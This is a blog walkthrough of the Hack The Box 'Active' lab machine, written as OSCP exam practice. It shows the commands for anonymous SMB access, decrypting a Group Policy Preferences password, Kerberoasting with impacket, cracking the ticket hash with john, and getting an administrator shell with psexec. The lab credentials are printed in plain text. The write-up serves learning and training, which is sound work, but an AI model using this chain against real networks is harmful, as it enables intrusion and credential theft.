Hack The Box / Active
Active is our fourth machine in the OSCP list provided by NetSec Focus! This machine was a great learning experience where SMB enumeration and some knowledge about kerberos were essential in order to root this machine. This is the fourth blog before my third attempt to the OSCP exam, so let’s get to it!
Information Gathering
Nmap Scan
So, we start with a nmap scan to check what ports are open and what services are running in this machine.
nmap -sC -sV -p- -oN scan.nmap 10.10.10.100
Do not panic! That sounds like a lot of enumeration to do, and it is, but remember some of the important services in this nmap scan, which means that the important services for this machine are SMB, kerberos, and HTTP. But after doing some discovering and extense enumeration the services that will give a straight path to root this machine are SMB and kerberos.
SMB Enumeration
There are different tools to make SMB enumeration, you can use enum4linux, nmap-scripts, but my preference is smbmap due to its acurate results.
smbmap -H 10.10.10.100
Where:
-H
specifies the host to scan.
Looking to the results given by smbmap we can onlu access the share Replication anonymously. In order to access to Replication, we are going to need smbclient, as the log in is anonymously, we don’t need a password to get in.
smbclient //10.10.10.100/Replication
Once we loged in to SMB there are going to be many folders and files to look at, but the folder and file that actually gave food results was \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
which contains a xml files with interesting information about groups.
Once we get the file in our local host, this is the information from the xml file.
AAS you can see, it appears something called cpassword which has some kind of GPP encryption that we can decrypt with the tool called gpp-decrypt which is installed in Kali Linux. This is the command to decrypt the password.
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
After executing the command we got a password which is GPPstillStandingStrong2k18
, but what about the user? Well, in the xml file showed above appears clearly that the username is SVG_TGS
, then we can use this username and password to access to SMB but not anonymously, this time as a registered user.
smbclient //10.10.10.100/Users -U SVC_TGS
User Flag
After loging in there is a good chance to obtain the user flag where it’s located in \SVG_TGS\Desktop
and get can transfer it to our localhost and read it!
wolah! We got user.
Getting Root
Doing this on my own was complicated due to my lack of knowledge about kerberos enumeration, so I have to thank 0xRick for his explanation about kerberoasting. Before attempting this please add 10.10.10.100
in your /etc/hosts/
file as active.htb
in order to execute successfully this attack.
Get User SPNs
There is a good tool in the impacket tool set called GetUserSPNs.py which allows us to get the administrator hash using our credentials from the user.
./GetUserSPNs.py -request active.htb/SVC_TGS
And we have a hash! It’s time to use John to crack this hash.
Cracking The Hash with John
After saving the hash we can in file where I saved it as admin
we can use john and a wordlist in order to crack the hash and obtin the password with the following command.
john -w=/usr/share/wordlists/rockyou.txt admin
Where
w=
specifies the wordlist to use to crack the password.
And out administrator password is: Ticketmaster1968
!
Using psexec to Get The Root Flag.
From impacket there are another amazing tool called psexec.py where having the adminstrator password will allow us to connect to the machine and request the command prompt from the administrator.
python3 psexec.py administrator@active.htb
And we got the root flag!
To conclude
Enumeration in the important services is a good technique to avoid rabbit holes, also I learned that SMB can be useful for getting files and information from the victim machine. Also impacket has a good set of networking tools that its usage will be beneficial at the time to do penetration testing.
Leave a comment